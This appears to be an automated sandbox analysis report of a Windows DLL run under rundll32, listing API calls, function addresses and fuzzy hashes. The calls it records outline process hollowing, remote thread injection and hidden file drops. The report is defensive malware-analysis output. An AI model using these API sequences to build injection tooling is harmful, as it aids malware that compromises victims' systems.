    execution_graph (rendered as an interactive graph in the original report; the raw node and edge listing is not reproduced here). Node labels are function addresses in the analysed module. The API calls recorded on the nodes, grouped by the entry node of each subgraph:
    • 1000ae00: GetModuleFileNameA, strrchr, GetCommandLineA, a PeekMessageA / GetMessageA / TranslateMessage / DispatchMessageA loop, _ftol, wsprintfA + MessageBoxA on error paths, ExitProcess
    • 1000b390 (reached from 10009205 and 10008fae): GetModuleHandleA, LoadLibraryA, strchr, atoi, GetProcAddress, wsprintfA + MessageBoxA, ExitProcess
    • 10004606 (a second copy of the same subgraph is rooted at 100045fc): GetEnvironmentVariableA, CreateProcessA, GetThreadContext, ReadProcessMemory, NtUnmapViewOfSection, VirtualAllocEx, LocalSize, lstrcpyn, RtlMoveMemory, WaitForSingleObject, CloseHandle, TerminateProcess
    • 10008e08 -> 10007548: Sleep, PathFileExistsA, CreateFileA / WriteFile / CloseHandle, SetFileAttributesA, RegOpenKeyA / RegQueryValueExA / RegCloseKey, RegEnumKeyA, CreateToolhelp32Snapshot, OpenProcess, VirtualQueryEx, WideCharToMultiByte, _strnicmp, _strncoll, memmove, sprintf, modf, _ftol
    • 1000753c -> 100061d0: EnumWindows, GetClassNameA, GetWindowThreadProcessId, GetCurrentProcessId, GetWindowTextA, VirtualProtect, PathIsDirectoryA, CreateDirectoryA, PathFileExistsA, DeleteFileA, CopyFileA, strncpy, _strnicmp, _strncoll, _CIfmod, _CIpow
    • 1000b4e0 -> 10008f24 -> 10001027 / 100013d3: WSAStartup, GetPEB, GetModuleFileNameA, SetFileAttributesA, CreateFileA / WriteFile / CloseHandle, LoadLibraryA, CreateRemoteThreadEx (two call sites, 10001635 and 10001753)
    • 1000c440: SHGetSpecialFolderPathA, GetWindowsDirectoryA, GetSystemDirectoryA, GetTempPathA
    • 1008354a: VirtualAlloc, VirtualFree, VirtualProtect
    • runtime and heap helpers shared by the subgraphs above: GetProcessHeap, RtlAllocateHeap, RtlReAllocateHeap, RtlFreeHeap, HeapFree, IsBadHugeReadPtr, FreeLibrary, ??2@YAPAXI, ??3@YAXPAX
    APIs
    • LocalSize.KERNEL32(00000000), ref: 1000372A
    • RtlMoveMemory.NTDLL(00000000,?), ref: 100039B0
    • LocalSize.KERNEL32(00000000), ref: 10003D81
    • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 1000417F
    • LocalSize.KERNEL32(00000000), ref: 10004484
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: LocalSize$MemoryMove
    • String ID:
    • API String ID: 2329245388-0
    • Opcode ID: 7ace0d35f767871dd564e10688227d60866cd99a6ec69d537ca719f32c9c7f33
    • Instruction ID: 6597548e417ce41973f24dc3fe005e763f74c0b4b92ccc5acbc8f0888a27e9fc
    • Opcode Fuzzy Hash: 7ace0d35f767871dd564e10688227d60866cd99a6ec69d537ca719f32c9c7f33
    • Instruction Fuzzy Hash: 9163A4F5A812568BFB00CF58DCC1699B7F1FF69364B291471E846AB304D378B861DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    (Rendered as an interactive graph in the original report, with executed and not-executed basic blocks colour-coded; the raw node listing is not reproduced here. Function 10001817, basic blocks 10001817 through 10001f24. Internal calls: 10008f3c, 10008f42, 10008f48, 10001f4e, 100017fe, 10001007, 100024e3, 100027c4, 1000283c, 100097d0, 10002d17. Imports: GetModuleHandleA, NtAllocateVirtualMemory, NtReadVirtualMemory, NtFreeVirtualMemory, as listed under APIs below.)
    APIs
    • GetModuleHandleA.KERNEL32(?,?,?,00000000,00000001,00000001), ref: 100019EE
    • NtAllocateVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,00000000,00001000,00000040), ref: 10001B1D
    • NtReadVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,00000000,?), ref: 10001B63
    • NtAllocateVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,?,00001000,00000040), ref: 10001BF9
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001CF0
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001D29
    • NtAllocateVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,00000000,00003000,00000040), ref: 10001DA9
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001E35
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001E78
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: MemoryVirtual$Free$Allocate$HandleModuleRead
    • String ID:
    • API String ID: 3626904461-0
    • Opcode ID: e41221d228e3099dbaa53f065df4f9fc7eb341e2a8ca2d0f562e219e06e247af
    • Instruction ID: 18045018c71ed80e37ca4e743997fd2e00c365ecd51ce7d830d4e4c8732093b4
    • Opcode Fuzzy Hash: e41221d228e3099dbaa53f065df4f9fc7eb341e2a8ca2d0f562e219e06e247af
    • Instruction Fuzzy Hash: 6D1249B1D10219ABFF40DFA4DC82BEEB7B9EB09390F105035F515B6285E771AA44CB62
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    APIs
    • GetModuleFileNameA.KERNEL32(000000FF), ref: 10001438
    • LoadLibraryA.KERNELBASE(?,?,?,10069CE3,?,?,?), ref: 10001589
    • CreateRemoteThreadEx.KERNELBASE(FFFFFFFF,00000000,00000000,1000753C,00000000,00000000,00000000,00000000), ref: 10001660
    • CreateRemoteThreadEx.KERNELBASE(FFFFFFFF,00000000,00000000,Function_00008E08,00000000,00000000,00000000,00000000), ref: 10001781
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: CreateRemoteThread$FileLibraryLoadModuleName
    • String ID: -K NetworkService
    • API String ID: 1086537905-2689450296
    • Opcode ID: b0c4e49a0226506626da4696a25d283b1a2ed37e453f38bc93039b9eaa77c593
    • Instruction ID: 192b5ded5049eacffa80d3a177baae0e671814ab7fcffe4313666e61edc3dd04
    • Opcode Fuzzy Hash: b0c4e49a0226506626da4696a25d283b1a2ed37e453f38bc93039b9eaa77c593
    • Instruction Fuzzy Hash: 07A121B5E10345ABFB40DFA0CCC2BEE76B9EB14780F104075F605BB286EA75AB149B51
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    APIs
    • PathIsDirectoryA.SHLWAPI(00000000), ref: 10002D72
    • PathIsDirectoryA.SHLWAPI(00000000), ref: 10002F46
    • CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 10002F7B
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: Directory$Path$Create
    • String ID:
    • API String ID: 2243348845-0
    • Opcode ID: 952b3ee820ae0fce44b1993c9e55d840ad73d41c8d9cbaca60f6c06b9dd94f26
    • Instruction ID: 1ec6a9b9599abdcb0927499382ee2c56efe62a98ad550a515e2561b25c9f74a4
    • Opcode Fuzzy Hash: 952b3ee820ae0fce44b1993c9e55d840ad73d41c8d9cbaca60f6c06b9dd94f26
    • Instruction Fuzzy Hash: 368151B5E00206ABFB40DFA4DC82BBEB7B5EF193C0F140079E545F6249E771AA548762
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    APIs
    • CreateFileA.KERNELBASE(00000000,00000002,00000000,00000000,00000002,00000020,00000000), ref: 1000308D
    • WriteFile.KERNELBASE(00000000,10007715,00000000,?,00000000), ref: 1000324E
    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000001,?,?,?,?,?,00000000), ref: 10003270
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: File$CloseCreateHandleWrite
    • String ID:
    • API String ID: 1065093856-0
    • Opcode ID: 56f5217a5ff58419c402300fced1701773d6cbec5d636d564aa0362071dec691
    • Instruction ID: d20d66cfc10cbe3857bc80674b720ab49801aad87d9546e672d044fe8a3a2069
    • Opcode Fuzzy Hash: 56f5217a5ff58419c402300fced1701773d6cbec5d636d564aa0362071dec691
    • Instruction Fuzzy Hash: C0619AF5D00205AFFB41DFA4DC83BAF77B5EB09380F104075F645AB286E6756A448BA2
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    APIs
    • TerminateProcess.KERNELBASE(00000000,00000000,?,10005668,00000000,00000000), ref: 10005E7D
    • CloseHandle.KERNEL32(00000000,?,10005668,00000000,00000000), ref: 10005EAC
    • CloseHandle.KERNEL32(00000000,?,10005668,00000000,00000000), ref: 10005ED8
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: CloseHandle$ProcessTerminate
    • String ID:
    • API String ID: 1541851893-0
    • Opcode ID: 7c947d757b40d2b1d0a58a98e59bc80ae9684e0590784dd83700156d9b6bac4d
    • Instruction ID: 36467d162fe4f9701ac00e92914ba883088f779945990f223c5d709893f0a5e0
    • Opcode Fuzzy Hash: 7c947d757b40d2b1d0a58a98e59bc80ae9684e0590784dd83700156d9b6bac4d
    • Instruction Fuzzy Hash: 883130B4A00318EBEF00DF94D9C1B9EBB70FB0E351F1050A5EA486B356C7716A54DBA6
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: a21b6345c22cde698bb8e6042296a18b9237ae50acfa973f10934829fa115130
    • Instruction ID: 6bd08ba5558e1723e664c623841c749a5d5f02c338c490c126332124de29b97e
    • Opcode Fuzzy Hash: a21b6345c22cde698bb8e6042296a18b9237ae50acfa973f10934829fa115130
    • Instruction Fuzzy Hash: 35B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 1999a4e140ade5994fbc139359fbd3a3e3541bf41f421a645fe8dc29bbbb4e7d
    • Instruction ID: a6a88fea8a15b71c93179c30403b5c246083cf119354f26f4d88da3cc7a861b2
    • Opcode Fuzzy Hash: 1999a4e140ade5994fbc139359fbd3a3e3541bf41f421a645fe8dc29bbbb4e7d
    • Instruction Fuzzy Hash: 56B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 21b147d3242dff41688a4e607ccc271381ba4f9bf2a3db1154b2a9a322427d62
    • Instruction ID: 18200786322e2296e48886ba80c3c0a0571579295a8a8f8cccfe2eafa6c45a37
    • Opcode Fuzzy Hash: 21b147d3242dff41688a4e607ccc271381ba4f9bf2a3db1154b2a9a322427d62
    • Instruction Fuzzy Hash: 33B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: a8e977d5e6929cacd8ac213e15fadd063f0ff8242314a0019d4a04ef5fe6b589
    • Instruction ID: 2ab24672fad017e54084c68c726b6677777c2dd61183461ce3e7d2b956ec3b11
    • Opcode Fuzzy Hash: a8e977d5e6929cacd8ac213e15fadd063f0ff8242314a0019d4a04ef5fe6b589
    • Instruction Fuzzy Hash: 42B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 3dc280fe55abc01b58db292e390aabea07e0da105420eb392ee7620be3622837
    • Instruction ID: 4fc1348e7e92fee5a10d5f52c872e9f0b591b432bef915be5527e0563184c5c5
    • Opcode Fuzzy Hash: 3dc280fe55abc01b58db292e390aabea07e0da105420eb392ee7620be3622837
    • Instruction Fuzzy Hash: 85B1A8F1A402529BFF00CFA8DCC1B8977A5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 62d3435ecaf67b690040494e715479c48cb913ef0c9a276450b22e2695167ed7
    • Instruction ID: ac85400423f5c659f8c14131d3889ba6e7c23d82175b45f4af381173e65af412
    • Opcode Fuzzy Hash: 62d3435ecaf67b690040494e715479c48cb913ef0c9a276450b22e2695167ed7
    • Instruction Fuzzy Hash: BCB1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    APIs
    • WSAStartup.WS2_32(?,00000000), ref: 10001148
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: Startup
    • String ID:
    • API String ID: 724789610-0
    • Opcode ID: 0b9b7ad6b27d15674f0398aaa48fba4813a74bb0a603e7b5ba06d62348bc4f8d
    • Instruction ID: d74f7e4fc3d2271a8ab4d4adfaa925da7f5db712bb5ec264062f05ece0e1d290
    • Opcode Fuzzy Hash: 0b9b7ad6b27d15674f0398aaa48fba4813a74bb0a603e7b5ba06d62348bc4f8d
    • Instruction Fuzzy Hash: 7C8184F6A402025BF740CB68DCC1BAA73E9EF583A4F290075E9059B345E679BD15C722
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 1000A7EE
    • strrchr.MSVCRT ref: 1000A817
    • RegOpenKeyA.ADVAPI32(00000000,00000000,?), ref: 1000A830
    • ??2@YAPAXI@Z.MSVCRT ref: 1000A853
    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00000400,?,?,?,00000698,00000000,00000000,00000000,?), ref: 1000A876
    • ??3@YAXPAX@Z.MSVCRT ref: 1000A884
    • ??2@YAPAXI@Z.MSVCRT ref: 1000A88E
    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000698,00000000,00000000,00000000), ref: 1000A8AB
    • ??3@YAXPAX@Z.MSVCRT ref: 1000A8DA
    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000698,00000000,00000000,00000000,?), ref: 1000A8E7
    • ??3@YAXPAX@Z.MSVCRT ref: 1000A8EE
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: ??2@??3@$QueryValue$CloseOpenstrrchr
    • String ID:
    • API String ID: 1380196384-0
    • Opcode ID: 0055807da5042bb647736de19bf315c7cc7080262b94f7f0173f30ff330bb7ad
    • Instruction ID: b054589480694306ed07ebfcb3a54d079748cc68523788b519db9fcbf24356dc
    • Opcode Fuzzy Hash: 0055807da5042bb647736de19bf315c7cc7080262b94f7f0173f30ff330bb7ad
    • Instruction Fuzzy Hash: A04106756003055BF314DB689C45E2B77D8EFC12E0F144A2DFA55C3285EE76ED0A83A2
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    APIs
    • GetModuleHandleA.KERNEL32(?), ref: 1000B3A2
    • LoadLibraryA.KERNEL32(?), ref: 1000B3AF
    • wsprintfA.USER32 ref: 1000B3C6
    • MessageBoxA.USER32(00000000,?,1006A09C,00000010), ref: 1000B3DC
      • Part of subcall function 10009390: ExitProcess.KERNEL32 ref: 100093A5
    • atoi.MSVCRT ref: 1000B41B
    • strchr.MSVCRT ref: 1000B453
    • GetProcAddress.KERNEL32(00000000,00000040), ref: 1000B471
    • wsprintfA.USER32 ref: 1000B489
    • MessageBoxA.USER32(00000000,?,1006A09C,00000010), ref: 1000B49F
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: Messagewsprintf$AddressExitHandleLibraryLoadModuleProcProcessatoistrchr
    • String ID:
    • API String ID: 3187504500-0
    • Opcode ID: eaf7c88fcb441d378e7e4088570b6a5866bbed45d5bfb5cc9ea4a237190b3f69
    • Instruction ID: 491f2c0a62f37e4f67161009499e29b69e0f741f7a8c9d6e7004f4b75a98df72
    • Opcode Fuzzy Hash: eaf7c88fcb441d378e7e4088570b6a5866bbed45d5bfb5cc9ea4a237190b3f69
    • Instruction Fuzzy Hash: FC314AB26007555FF320EF24DC84B9B7B98EB85380F004929FB0993246EB75E909CBB5
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    APIs
    • CreateFileA.KERNELBASE(80000004,80000000,00000003,00000000,00000003,00000020,00000000,?,10001489,00000001,10069CDF,00000000,80000004,00000001), ref: 100096B5
    • GetFileSize.KERNEL32(00000000,10069CDF,?,00000268,?,10001489,00000001,10069CDF,00000000,80000004,00000001), ref: 100096CC
      • Part of subcall function 10009430: GetProcessHeap.KERNEL32(1000B517,00000008,00000002,00000000,10009825,00000007,00000003,?,?,1000261C,00000003,00000000,00000000,80000005,00000002,00000000), ref: 10009439
      • Part of subcall function 10009430: RtlAllocateHeap.NTDLL(1006A1D4,00000008,80000301), ref: 1000944D
      • Part of subcall function 10009430: MessageBoxA.USER32(00000000,10069FE8,10069FB4,00000010), ref: 10009466
    • ReadFile.KERNELBASE(00000000,00000008,00000000,?,00000000,00000001), ref: 100096F8
    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 100096FF
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: File$Heap$AllocateChangeCloseCreateFindMessageNotificationProcessReadSize
    • String ID:
    • API String ID: 4143106703-0
    • Opcode ID: 9381e33eb8e62eb59d2cf853d973df5be84e3c18288bfb382a4d906760cea2b3
    • Instruction ID: cdbe4ea1d30985889301e2374bea63683511f888104e621f128e3cfb89859431
    • Opcode Fuzzy Hash: 9381e33eb8e62eb59d2cf853d973df5be84e3c18288bfb382a4d906760cea2b3
    • Instruction Fuzzy Hash: 37F04476201310BBF3119F64DCC9FAB77BCEB84B90F104A1EF646961D5E670A5058771
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    APIs
    • GetProcessHeap.KERNEL32(1000B517,00000008,00000002,00000000,10009825,00000007,00000003,?,?,1000261C,00000003,00000000,00000000,80000005,00000002,00000000), ref: 10009439
    • RtlAllocateHeap.NTDLL(1006A1D4,00000008,80000301), ref: 1000944D
    • MessageBoxA.USER32(00000000,10069FE8,10069FB4,00000010), ref: 10009466
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: Heap$AllocateMessageProcess
    • String ID:
    • API String ID: 2992861138-0
    • Opcode ID: 03d92ac7cbc8daedce1c15d98e9ff78b1ea41ed49775963adbdf35a54df7367f
    • Instruction ID: ca495d503fa8b24896a3a0ddeaa4d588f6ba14c0d85a12038cb70845f0cd2cd9
    • Opcode Fuzzy Hash: 03d92ac7cbc8daedce1c15d98e9ff78b1ea41ed49775963adbdf35a54df7367f
    • Instruction Fuzzy Hash: 59E0D8B56401317BF310FB609C49F8A7698DB057C1F014015FD05D6154E774D8018B71
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    APIs
    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 1008363F
    • VirtualProtect.KERNELBASE(?,?,7373652D,73736297,?,7373652D,00000000,73736297), ref: 100837AE
    Memory Dump Source
    • Source File: 00000003.00000002.336246305.0000000010080000.00000040.00000800.00020000.00000000.sdmp, Offset: 10080000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10080000_rundll32.jbxd
    Similarity
    • API ID: Virtual$FreeProtect
    • String ID:
    • API String ID: 2581862158-0
    • Opcode ID: 5116512cfd6bf09bdea013bebf5e822baf0d3f282df84516e26171709676dcb2
    • Instruction ID: cbfd066a6669cc03ceefd0d281f04ad6062c5cf2e557b09b294620d1cb926219
    • Opcode Fuzzy Hash: 5116512cfd6bf09bdea013bebf5e822baf0d3f282df84516e26171709676dcb2
    • Instruction Fuzzy Hash: C5612572E04210AFDB21CA18CC847AAB7A1FFC5350F74C4A6D8899B391E775AD92CB50
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    APIs
    • IsBadHugeReadPtr.KERNEL32(10009B89,00000008), ref: 100094EE
    • RtlFreeHeap.NTDLL(1006A1D4,00000000,10009B89), ref: 10009500
      • Part of subcall function 10009360: GetModuleHandleA.KERNEL32(1006A1C0,10009536,?,?,?,100081F5,00000001,?,?,?,00000000), ref: 1000936A
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: FreeHandleHeapHugeModuleRead
    • String ID:
    • API String ID: 3105250205-0
    • Opcode ID: ca834bc4244fce640a793ff6be1dd1a44b6c0ac53575205badff9968adfb3274
    • Instruction ID: f4d6e6dfc0ea5ddfd767db067c6581f7df8aba6c1037937aeb9ef0df71b1f4fd
    • Opcode Fuzzy Hash: ca834bc4244fce640a793ff6be1dd1a44b6c0ac53575205badff9968adfb3274
    • Instruction Fuzzy Hash: 47E01231E0253297F621FB179C88A4A77D9EB477D1F014016F545A7058D374AC818FA1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00EC0625
    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00EC0658
    Memory Dump Source
    • Source File: 00000003.00000003.311847948.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_3_ec0000_rundll32.jbxd
    Similarity
    • API ID: Virtual$AllocFree
    • String ID:
    • API String ID: 2087232378-0
    • Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
    • Instruction ID: 72553b4def038dc18ac3dd899b8ea0e30eec51cf8a52fbd37e2c0d82c8691305
    • Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
    • Instruction Fuzzy Hash: 10213831A00219FFDB108FA0CC40FEEFBF5EB54394F208126E920A2280E7764A129B50
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    APIs
    • SetFileAttributesA.KERNELBASE(00000000,00000002,10007744,00000002,00000000,00000000,80000004,00000002,00000000,80000301,00000000,10069CE3,10069CDB,100695C2,00000000), ref: 1000971A
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: AttributesFile
    • String ID:
    • API String ID: 3188754299-0
    • Opcode ID: 2708e965b174b85047c8d0145172c59c26a25c7f0d4e6f625563eef8cc2badcf
    • Instruction ID: ba1b9f9736472015c9caeb0e2b2585a1f4e95ecc7d51d8cd3f73c6f4105449ec
    • Opcode Fuzzy Hash: 2708e965b174b85047c8d0145172c59c26a25c7f0d4e6f625563eef8cc2badcf
    • Instruction Fuzzy Hash: 7EB092B4104201ABDA04DB10C984D2A77A8AB84280F004848B44982110C630D844CA32
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
